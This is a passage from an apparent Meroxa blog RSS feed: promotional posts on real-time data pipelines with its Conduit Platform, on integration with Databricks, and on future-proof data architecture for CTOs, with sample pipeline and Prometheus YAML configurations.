        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgresql&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//meroxauser&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;meroxapass@127.0.0.1&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;5432/meroxadb
          &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Users
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example.out
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;file
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./users.txt
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; decode
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json.decode &lt;span class=&quot;token comment&quot;&gt;# using a builtin processor provided by conduit.&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; .Payload.After&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;3. &lt;strong&gt;Scalable, Cloud-Native Architecture&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform’s distributed, cloud-native infrastructure is designed for high availability and fault tolerance. This makes it capable of processing large-scale, high-velocity data streams efficiently.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Example:&lt;/strong&gt; The Conduit Platform can handle continuous streams of IoT sensor data from millions of devices, adapting dynamically to spikes in data volume.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Metric Highlight:&lt;/strong&gt; With horizontal scaling, the Conduit Platform can process billions of events daily, reducing latency by up to 50% compared to batch systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;4. &lt;strong&gt;Real-Time Observability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform provides built-in observability tools, giving data engineers and analysts real-time visibility into pipeline performance. Metrics, logs, and alerts are accessible via APIs and integrations with tools like Grafana and Prometheus.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Comparison:&lt;/strong&gt; Batch systems often rely on delayed or after-the-fact reporting, making real-time troubleshooting difficult.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feature Highlight:&lt;/strong&gt; Conduit’s data lineage tracking ensures transparency and simplifies compliance audits.&lt;/li&gt;
&lt;/ul&gt;
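&lt;p&gt;For example, a self-hosted Conduit instance exposes Prometheus-format metrics over its HTTP API, so a minimal Prometheus scrape job might look like the following. The host and port are assumptions about your deployment; adjust them to match your setup:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;scrape_configs:
  - job_name: conduit
    metrics_path: /metrics
    static_configs:
      - targets: ['localhost:8080'] # assumed Conduit HTTP port; change for your deployment&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;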
&lt;h3&gt;5. &lt;strong&gt;Developer-Friendly Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform simplifies pipeline development with intuitive APIs, CLI tools, and pre-configured connectors, reducing the complexity of setup and maintenance.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;User Perspective:&lt;/strong&gt; Data engineers can deploy a real-time pipeline in minutes, enabling faster time-to-value compared to traditional batch workflows that require extensive setup.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Real-World Use Cases for Real-Time Pipelines&lt;/h3&gt;
&lt;p&gt;Here’s how real-time pipelines, powered by Meroxa’s Conduit Platform, are transforming industries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;E-Commerce:&lt;/strong&gt; Real-time processing of user behavior data to deliver instant product recommendations, increasing engagement and conversion rates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Finance:&lt;/strong&gt; Continuous monitoring of transactions to detect fraud in real-time, reducing financial losses and enhancing customer trust.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Healthcare:&lt;/strong&gt; Streaming IoT device data to monitor patient vitals and trigger timely interventions, improving outcomes and operational efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Logistics:&lt;/strong&gt; Dynamic optimization of delivery routes using live traffic and weather data, reducing delays and operational costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why Real-Time Is the Future&lt;/h3&gt;
&lt;p&gt;As businesses become increasingly reliant on data to drive decisions, the shift from batch to real-time pipelines is inevitable. Real-time processing provides the agility, efficiency, and accuracy that modern organizations need to thrive in competitive markets. By choosing Meroxa’s Conduit Platform, data engineers, analysts, and businesses can unlock the full potential of real-time data—without the headaches of traditional batch systems.&lt;/p&gt;
&lt;h3&gt;Ready to Go Real-Time?&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform makes it simple to build and scale real-time data pipelines. Whether you’re starting from scratch or modernizing existing batch workflows, our platform has the tools you need to succeed.&lt;/p&gt;
&lt;p&gt;👉 &lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Start your real-time journey today&lt;/a&gt; with Meroxa’s Conduit Platform.&lt;/strong&gt; Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time AI Made Simple: How Meroxa and Databricks Work Together]]></title><description><![CDATA[Whether you’re building recommendation engines, fraud detection systems, or dynamic pricing models, real-time data powers smarter and faster decisions. For Databricks users, the platform already excels at advanced analytics and AI. Pair it with Meroxa’s seamless, cost-effective real-time data ingestion and transformation capabilities to unlock the full potential of real-time AI workflows. Together, Meroxa and Databricks simplify complex streaming architectures, enabling accurate insights and faster business outcomes without the usual headaches or costs.]]></description><link>https://meroxa.com/blog/real-time-ai-made-simple-how-meroxa-and-databricks-work-together</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-ai-made-simple-how-meroxa-and-databricks-work-together</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 21 Jan 2025 10:59:00 GMT</pubDate><content:encoded>&lt;p&gt;In today’s fast-paced world, businesses are demanding faster and smarter insights from their data. Whether you’re building recommendation engines, real-time fraud detection systems, or dynamic pricing models, timely data can make the difference between staying ahead of the competition or falling behind.&lt;/p&gt;
&lt;p&gt;If you’re an existing Databricks user, you already know how powerful its platform can be for large-scale data processing, advanced analytics, and AI model training. But what if you could complement Databricks with an easy-to-use, cost-effective solution for real-time data ingestion and transformation? That’s where Meroxa comes in. Together, Meroxa and Databricks empower you to harness the power of real-time AI workflows—without the complexity and costs that usually come with streaming data.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;The Power of Real-Time AI&lt;/h2&gt;
&lt;p&gt;AI models are only as good as the data they’re trained on. Historically, many organizations relied on batch pipelines that ran daily or weekly, which meant that AI models were working off stale data. With real-time data, you can continuously feed the most up-to-date information into your AI pipelines—leading to more accurate predictions, faster responses to changing market conditions, and overall improved business outcomes.&lt;/p&gt;
&lt;p&gt;However, implementing real-time streaming can be challenging. It often requires specialized infrastructure to collect, process, and deliver streaming data at scale. That’s why we built Meroxa to abstract away that complexity. Our platform seamlessly integrates with Databricks so you can transform your streaming data into insights—at a fraction of the complexity and cost.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;How Meroxa and Databricks Work Together&lt;/h2&gt;
&lt;p&gt;Meroxa is designed to handle data ingestion and transformation in real-time. Databricks excels at large-scale data processing, model building, and inference. Here’s a high-level look at how data flows between the two:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/databricks-flow.png&quot; alt=&quot;databricks-flow.png&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Ingestion&lt;/strong&gt;: Meroxa connects to various data sources—ranging from databases and APIs to IoT devices—to ingest streaming data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Transformation&lt;/strong&gt;: Meroxa processes and enriches the data in-flight, ensuring it’s clean, well-structured, and ready for analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Lake&lt;/strong&gt;: The transformed data is delivered to Databricks (Delta Lake), where it can be immediately leveraged for analytics or AI workflows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Building and Inference&lt;/strong&gt;: Using Databricks’ powerful notebooks and Spark-based infrastructure, data scientists train and deploy AI models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Predictions&lt;/strong&gt;: The resulting insights or predictions can be pushed back into downstream applications, dashboards, or other systems for immediate action.&lt;/li&gt;
&lt;/ol&gt;
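&lt;p&gt;Steps 1 through 3 above can be sketched as a single Conduit pipeline configuration. This is a minimal illustration under stated assumptions, not a drop-in setup: the S3 connector reference, setting names, bucket, and credentials are placeholders, and the idea is that Databricks (for example, via Auto Loader) then ingests the staged objects into Delta Lake:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;version: 2.2
pipelines:
  - id: postgres-to-delta-staging
    status: running
    connectors:
      - id: orders-source
        type: source
        plugin: builtin:postgres
        settings:
          url: postgresql://user:pass@db.internal:5432/appdb # placeholder credentials
          table: orders
      - id: delta-staging
        type: destination
        plugin: standalone:s3 # assumes the standalone S3 connector is installed
        settings:
          aws.bucket: delta-staging-bucket # placeholder; Databricks Auto Loader reads from here
          aws.region: us-east-1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;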
&lt;hr&gt;
&lt;h2&gt;Pros and Cons of Real-Time Streaming with Databricks&lt;/h2&gt;
&lt;h3&gt;Customer Value&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Real-time data enables immediate insights, allowing you to enhance customer experiences, reduce fraud, or refine recommendations on the fly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: A real-time approach requires more diligence around data quality and governance to ensure accurate results.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Performance&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Databricks, with its scalable compute engine, can handle massive throughput, making it suitable for high-velocity data streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: If not configured properly, streaming workloads can become resource-intensive.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Complexity&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Databricks notebooks provide a familiar environment for data engineers and data scientists. Meroxa’s automation reduces the complexity of managing multiple real-time data pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: Setting up and managing a streaming architecture from scratch is traditionally complex. However, Meroxa alleviates much of that burden by providing managed, easy-to-configure connectors and transformations.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Compute Cost&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pros&lt;/strong&gt;: Streaming can lower the cost of data processing by reducing reliance on batch windows and large, one-time compute spikes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cons&lt;/strong&gt;: Always-on streaming clusters can drive up compute costs if not carefully orchestrated. By offloading real-time ingestion and transformations to Meroxa, you only pay for what you use, helping manage costs more effectively.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Meroxa: Real-Time AI Without the Headaches&lt;/h2&gt;
&lt;p&gt;Implementing real-time data streams shouldn’t be overwhelming—or expensive. Meroxa’s fully managed platform abstracts away much of the complexity involved in ingesting, processing, and routing streaming data. Our ready-to-use connectors, real-time transformations, and intuitive UI make it easy to onboard new data sources and pipelines—no need to spin up additional infrastructure or juggle multiple services.&lt;/p&gt;
&lt;p&gt;Meanwhile, Databricks handles what it does best: large-scale data processing, advanced analytics, and AI model development. Together, Meroxa and Databricks form a powerful combination that yields more accurate AI models, quicker time-to-insight, and significantly lower operational overhead.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Call to Action&lt;/h2&gt;
&lt;p&gt;Ready to unlock the potential of real-time AI? Start by using &lt;strong&gt;Meroxa&lt;/strong&gt; for your data ingestion and transformation needs. Then, harness the power of &lt;strong&gt;Databricks&lt;/strong&gt; for model building and inference. With Meroxa taking care of real-time data and Databricks focusing on advanced analytics and AI, you can drive powerful new insights—faster and more affordably than ever.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Get started today&lt;/a&gt;&lt;/strong&gt; and see how Meroxa + Databricks can help you streamline your data pipelines, reduce operational complexity, and take your AI initiatives to the next level.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building a Future-Proof Data Architecture: A CTO’s Guide]]></title><description><![CDATA[Discover how CTOs can tackle fragmented data, scalability, compliance, and vendor lock-in challenges. This blog highlights how Meroxa’s Conduit Platform enables real-time data integration, optimized costs, and innovation-ready architectures to future-proof your enterprise.]]></description><link>https://meroxa.com/blog/building-a-future-proof-data-architecture-a-ctos-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-a-future-proof-data-architecture-a-ctos-guide</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 16 Jan 2025 11:06:00 GMT</pubDate><content:encoded>&lt;p&gt;As a CTO in 2025, you&apos;re facing a perfect storm of data challenges. Your board is asking about AI strategy, your teams are drowning in data silos, and everyone wants real-time insights yesterday. Meanwhile, you&apos;re trying to balance innovation with stability, cost with capability, and speed with security.&lt;/p&gt;
&lt;p&gt;Let&apos;s cut through the noise and talk about what really matters in building a data architecture that won&apos;t be obsolete by the time you finish implementing it.&lt;/p&gt;
&lt;h2&gt;The Shifting Landscape&lt;/h2&gt;
&lt;p&gt;Remember when data architecture was simpler? When batch processing was enough, when &quot;real-time&quot; meant daily updates, and when AI was something you&apos;d read about in research papers? Those days are gone, and they&apos;re not coming back.&lt;/p&gt;
&lt;p&gt;Today&apos;s landscape demands architectures that can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Process data in genuine real-time (not &quot;near&quot; real-time)&lt;/li&gt;
&lt;li&gt;Support AI/ML workflows natively&lt;/li&gt;
&lt;li&gt;Scale elastically without breaking the bank&lt;/li&gt;
&lt;li&gt;Adapt to new data sources and types without requiring rebuilds&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And tomorrow? The demands will only increase.&lt;/p&gt;
&lt;h2&gt;The Three Pillars of Future-Proof Architecture&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dalle-2025-01-15-20.50.48-3-pillars.png&quot; alt=&quot;DALLE - 2025-01-15-20.50.48-3-pillars.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;After working with hundreds of CTOs and enterprise architects, we&apos;ve identified three core principles that separate architectures that scale and adapt from those that become tomorrow&apos;s technical debt.&lt;/p&gt;
&lt;h3&gt;1. Real-Time First, Not Real-Time Later&lt;/h3&gt;
&lt;p&gt;Here&apos;s an uncomfortable truth: if you&apos;re not building for real-time data now, you&apos;re already behind. The &quot;we&apos;ll add real-time later&quot; approach is the technical equivalent of planning to dig a basement after building your house.&lt;/p&gt;
&lt;p&gt;Real-time isn&apos;t just about speed – it&apos;s about architectural flexibility. When your foundation supports real-time data flows, batch processing becomes just a special case of your real-time capabilities, not the other way around.&lt;/p&gt;
&lt;p&gt;What this means in practice:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Change Data Capture (CDC) should be your default approach, not an afterthought&lt;/li&gt;
&lt;li&gt;Your data pipeline should handle streaming data natively&lt;/li&gt;
&lt;li&gt;Event-driven architectures should be your foundation, not an add-on&lt;/li&gt;
&lt;li&gt;Latency should be measured in milliseconds, not minutes&lt;/li&gt;
&lt;/ul&gt;
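&lt;p&gt;To make &quot;CDC as the default&quot; concrete, here is a minimal sketch of a Conduit Postgres source configured for log-based change capture rather than polling. Treat the &lt;code&gt;cdcMode&lt;/code&gt; setting and its &lt;code&gt;logrepl&lt;/code&gt; value as assumptions to verify against the connector documentation for your version; the connection URL and table are placeholders:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;version: 2.2
pipelines:
  - id: cdc-first
    status: running
    connectors:
      - id: app-db
        type: source
        plugin: builtin:postgres
        settings:
          url: postgresql://user:pass@db.internal:5432/appdb # placeholder
          table: orders
          cdcMode: logrepl # assumption: capture changes via logical replication&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;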
&lt;h3&gt;2. Decoupled by Design&lt;/h3&gt;
&lt;p&gt;The most future-proof architectures are those that allow components to evolve independently. Think LEGO blocks, not concrete monuments.&lt;/p&gt;
&lt;p&gt;This means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Embracing event-driven architectures that naturally decouple producers from consumers&lt;/li&gt;
&lt;li&gt;Using standardized data contracts between systems&lt;/li&gt;
&lt;li&gt;Implementing async workflows by default&lt;/li&gt;
&lt;li&gt;Treating data platforms as products, not projects&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal isn&apos;t just flexibility – it&apos;s survival. When (not if) you need to swap out components or add new capabilities, a decoupled architecture lets you evolve without revolution.&lt;/p&gt;
&lt;h3&gt;3. Data as a Product, Not a Byproduct&lt;/h3&gt;
&lt;p&gt;Stop treating data as something that just happens. In a future-proof architecture, data is a first-class product with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Clear ownership and governance&lt;/li&gt;
&lt;li&gt;Defined SLAs and quality metrics&lt;/li&gt;
&lt;li&gt;Versioning and lifecycle management&lt;/li&gt;
&lt;li&gt;Self-service access with proper controls&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This shift in mindset changes everything from how you structure teams to how you build pipelines.&lt;/p&gt;
&lt;h2&gt;The Technical Stack That Makes It Possible&lt;/h2&gt;
&lt;p&gt;Let&apos;s examine how data architectures need to evolve to meet future demands. First, let&apos;s look at what many organizations have today versus where they need to go.&lt;/p&gt;
&lt;h3&gt;Traditional Architecture: The Legacy Approach&lt;/h3&gt;
&lt;p&gt;In traditional data architectures, we typically see:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Batch ETL Processing
&lt;ul&gt;
&lt;li&gt;Scheduled jobs pulling data from source systems&lt;/li&gt;
&lt;li&gt;Complex ETL tools managing transformations&lt;/li&gt;
&lt;li&gt;Heavy reliance on data warehouses&lt;/li&gt;
&lt;li&gt;Delayed insights and high latency&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Siloed ML Operations
&lt;ul&gt;
&lt;li&gt;Separate pipelines for ML training&lt;/li&gt;
&lt;li&gt;Batch-oriented feature engineering&lt;/li&gt;
&lt;li&gt;Limited real-time inference capabilities&lt;/li&gt;
&lt;li&gt;Disconnected model serving&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Limited Real-time Capabilities
&lt;ul&gt;
&lt;li&gt;&quot;Near real-time&quot; through micro-batching&lt;/li&gt;
&lt;li&gt;Multiple data copies across systems&lt;/li&gt;
&lt;li&gt;Point-to-point integrations&lt;/li&gt;
&lt;li&gt;High maintenance overhead&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-24-132854.png&quot; alt=&quot;mermaid-diagram-2025-01-24-132854.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Future-Proof Architecture: The Modern Approach&lt;/h3&gt;
&lt;p&gt;The future-proof architecture fundamentally shifts how data flows through your organization:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The Foundation Layer
&lt;ul&gt;
&lt;li&gt;CDC captures changes instantly from source systems&lt;/li&gt;
&lt;li&gt;Event streaming backbone (like Kafka) provides real-time data highways&lt;/li&gt;
&lt;li&gt;Unified processing engine handles both streaming and batch&lt;/li&gt;
&lt;li&gt;Everything is real-time first, batch when needed&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Processing Layer
&lt;ul&gt;
&lt;li&gt;Stream processing enables instant transformations&lt;/li&gt;
&lt;li&gt;SQL and programmatic transformations coexist&lt;/li&gt;
&lt;li&gt;ML models serve and train on live data&lt;/li&gt;
&lt;li&gt;Automatic scaling based on actual load&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Serving Layer
&lt;ul&gt;
&lt;li&gt;Multiple serving patterns (real-time, batch, hybrid)&lt;/li&gt;
&lt;li&gt;Flexible consumption patterns (push, pull, subscribe)&lt;/li&gt;
&lt;li&gt;Universal data format support&lt;/li&gt;
&lt;li&gt;Granular controls and monitoring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-24-132639.png&quot; alt=&quot;mermaid-diagram-2025-01-24-132639.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Key Architectural Differences&lt;/h3&gt;
&lt;p&gt;The shift from traditional to future-proof architecture brings several critical improvements:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Data Freshness
&lt;ul&gt;
&lt;li&gt;Traditional: Hours or days old&lt;/li&gt;
&lt;li&gt;Future-proof: Real-time or near-instantaneous&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Scaling Approach
&lt;ul&gt;
&lt;li&gt;Traditional: Vertical scaling with fixed resources&lt;/li&gt;
&lt;li&gt;Future-proof: Horizontal scaling with elastic resources&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Integration Pattern
&lt;ul&gt;
&lt;li&gt;Traditional: Point-to-point connections&lt;/li&gt;
&lt;li&gt;Future-proof: Event-driven backbone&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;ML/AI Support
&lt;ul&gt;
&lt;li&gt;Traditional: Separate batch pipelines&lt;/li&gt;
&lt;li&gt;Future-proof: Integrated real-time feature engineering&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Implementation Using Meroxa&lt;/h3&gt;
&lt;p&gt;Here&apos;s how Meroxa implements these architectural principles:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Source Integration
&lt;ul&gt;
&lt;li&gt;Native CDC connectors for all major databases&lt;/li&gt;
&lt;li&gt;Zero-impact change capture&lt;/li&gt;
&lt;li&gt;Automatic schema evolution handling&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Real-time Processing
&lt;ul&gt;
&lt;li&gt;Instant data transformations&lt;/li&gt;
&lt;li&gt;Built-in stream processing&lt;/li&gt;
&lt;li&gt;Scalable event routing&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Destination Support
&lt;ul&gt;
&lt;li&gt;Multiple output formats and protocols&lt;/li&gt;
&lt;li&gt;Real-time API endpoints&lt;/li&gt;
&lt;li&gt;Flexible consumption patterns&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Making It Real: The Implementation Roadmap&lt;/h2&gt;
&lt;p&gt;Here&apos;s how to move from theory to practice:&lt;/p&gt;
&lt;h3&gt;Phase 1: Foundation Setting (3-6 months)&lt;/h3&gt;
&lt;p&gt;Start with a single high-value data flow:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Implement CDC on your most critical data sources&lt;/li&gt;
&lt;li&gt;Set up your real-time streaming backbone&lt;/li&gt;
&lt;li&gt;Build your first real-time pipelines&lt;/li&gt;
&lt;li&gt;Establish monitoring and observability&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Phase 2: Scaling Out (6-12 months)&lt;/h3&gt;
&lt;p&gt;Expand your real-time capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Add more data sources and types&lt;/li&gt;
&lt;li&gt;Implement self-service capabilities&lt;/li&gt;
&lt;li&gt;Build out your data product framework&lt;/li&gt;
&lt;li&gt;Establish governance patterns&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Phase 3: Innovation Enablement (Ongoing)&lt;/h3&gt;
&lt;p&gt;Now you can focus on value creation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Enable ML/AI workflows&lt;/li&gt;
&lt;li&gt;Implement advanced analytics&lt;/li&gt;
&lt;li&gt;Build real-time features&lt;/li&gt;
&lt;li&gt;Enable new business capabilities&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Role of Modern Platforms&lt;/h2&gt;
&lt;p&gt;This is where platforms like Meroxa come in. We&apos;re not just another tool in your stack – we&apos;re the foundation that makes this architecture possible without requiring an army of specialists.&lt;/p&gt;
&lt;p&gt;With Meroxa, you get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Native CDC capabilities that just work&lt;/li&gt;
&lt;li&gt;Real-time processing without the complexity&lt;/li&gt;
&lt;li&gt;Built-in governance and monitoring&lt;/li&gt;
&lt;li&gt;Enterprise-grade security and reliability&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Cost of Waiting&lt;/h2&gt;
&lt;p&gt;Every day you delay moving to a real-time, future-proof architecture is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Another day of accumulated technical debt&lt;/li&gt;
&lt;li&gt;Another missed opportunity for real-time insights&lt;/li&gt;
&lt;li&gt;Another competitor potentially pulling ahead&lt;/li&gt;
&lt;li&gt;Another AI use case you can&apos;t support&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Your Next Steps&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Assess your current architecture&apos;s real-time capabilities&lt;/li&gt;
&lt;li&gt;Identify your highest-value real-time use cases&lt;/li&gt;
&lt;li&gt;Start small but think big – pick a pilot project&lt;/li&gt;
&lt;li&gt;Partner with platforms that support your vision&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Looking Ahead&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dalle-2025-01-15-20.59.39-a-visionary-illustration-representing-the-future-of-data-architecture.png&quot; alt=&quot;DALLE - 2025-01-15-20.59.39-a-visionary-illustration-representing-the-future-of-data-architecture.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The future of data architecture isn&apos;t about bigger batch jobs or more complex ETL pipelines. It&apos;s about real-time, adaptable, and intelligent systems that can evolve as your needs change.&lt;/p&gt;
&lt;p&gt;The question isn&apos;t whether to make this shift – it&apos;s how quickly you can make it happen.&lt;/p&gt;
&lt;hr&gt;
